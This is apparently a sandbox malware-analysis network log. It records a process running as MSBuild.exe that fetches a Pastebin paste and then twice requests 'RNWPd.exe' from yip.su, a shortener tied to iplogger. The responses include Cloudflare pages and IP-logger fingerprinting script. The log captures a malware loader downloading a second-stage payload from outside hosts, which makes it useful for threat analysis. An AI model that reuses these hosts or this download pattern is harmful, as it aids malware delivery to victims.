2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63 Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 66 55 72 73 79 4a 37 74 33 64 53 57 6c 7a 4c 42 77 31 58 4e 6e 58 70 56 67 53 6c 51 77 6c 30 59 49 6c 79 69 7a 6a 75 76 6f 48 4d 6b 34 50 38 57 4a 34 46 61 73 5a 66 2e 69 71 5a 36 4d 45 30 35 59 52 59 36 51 64 45 68 71 44 55 54 6f 43 73 7a 6d 4c 31 4e 39 33 4f 32 69 46 70 58 32 48 65 63 79 65 64 49 41 52 49 6a 4a 4d 63 5a 30 2e 6e 67 55 62 48 68 5f 5f 55 58 69 54 57 77 48 47 47 73 42 37 62 31 52 32 4c 58 6e 72 59 67 79 47 53 4f 4f 69 53 5f 30 39 35 6e 42 32 51 48 55 77 38 78 7a 4d 65 4e 76 79 35 64 6b 39 61 65 53 71 32 67 57 63 51 61 4e 56 4d 49 6b 33 5f 47 50 33 5a 51 6c 54 37 78 78 6f 73 47 43 4e 67 33 37 30 61 7a 33 4a 5a 70 7a 7a 64 47 58 76 66 35 64 62 50 45 67 32 49 6e 46 46 69 6c 73 30 68 43 56 55 53 37 47 4a 6f 2e 53 30 50 71 50 2e 65 65 42 42 70 Data Ascii: fUrsyJ7t3dSWlzLBw1XNnXpVgSlQwl0YIlyizjuvoHMk4P8WJ4FasZf.iqZ6ME05YRY6QdEhqDUToCszmL1N93O2iFpX2HecyedIARIjJMcZ0.ngUbHh__UXiTWwHGGsB7b1R2LXnrYgyGSOOiS_095nB2QHUw8xzMeNvy5dk9aeSq2gWcQaNVMIk3_GP3ZQlT7xxosGCNg370az3JZpzzdGXvf5dbPEg2InFFils0hCVUS7GJo.S0PqP.eeBBp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49733	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:34 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:20:34 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4336f1bf6e2369-EWR
2024-09-16 19:20:34 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:20:34 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:20:34 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:20:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49734	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:20:35 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:20:36 UTC	908	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:20:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:20:36 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:20:36 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eX7oEAi4a%2BHQd%2BM5aIWlAziNpW%2BH%2BVIfP%2FDkd8Pqm%2BYaYO5c6wUU4BlP2StjYvZDWnPS%2F5YlpdjT3cdiZSGKI78lRz27l5ulj4yMdfurdEv3sdBdic7opno%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4336f8aa054407-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:20:36 UTC	461	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:20:36 UTC	1369	IN	Data Raw: 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 Data Ascii: visit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta
2024-09-16 19:20:36 UTC	1369	IN	Data Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f Data Ascii: kground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animatio
2024-09-16 19:20:36 UTC	1369	IN	Data Raw: 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 Data Ascii: ator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.index
2024-09-16 19:20:36 UTC	1369	IN	Data Raw: 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f Data Ascii: ript><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto
2024-09-16 19:20:36 UTC	1369	IN	Data Raw: 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c Data Ascii: ght:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><
2024-09-16 19:20:36 UTC	164	IN	Data Raw: 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: )),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:20:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49738	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:11 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:11 UTC	893	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.42901611328125 expires: Mon, 16 Sep 2024 19:21:11 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08GaDA7QGlLLPZoOaMabFDEyYwjQTiXHlHANI1D5BaLJ08vPLK9aVIkkGHlW0kWwzwQzfL2ZyvKuyk1u07s1qh42ftRgOg2NzBmpwKf%2B7MfmT1zVSUJLp7w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4337d8abe95e64-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:11 UTC	476	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
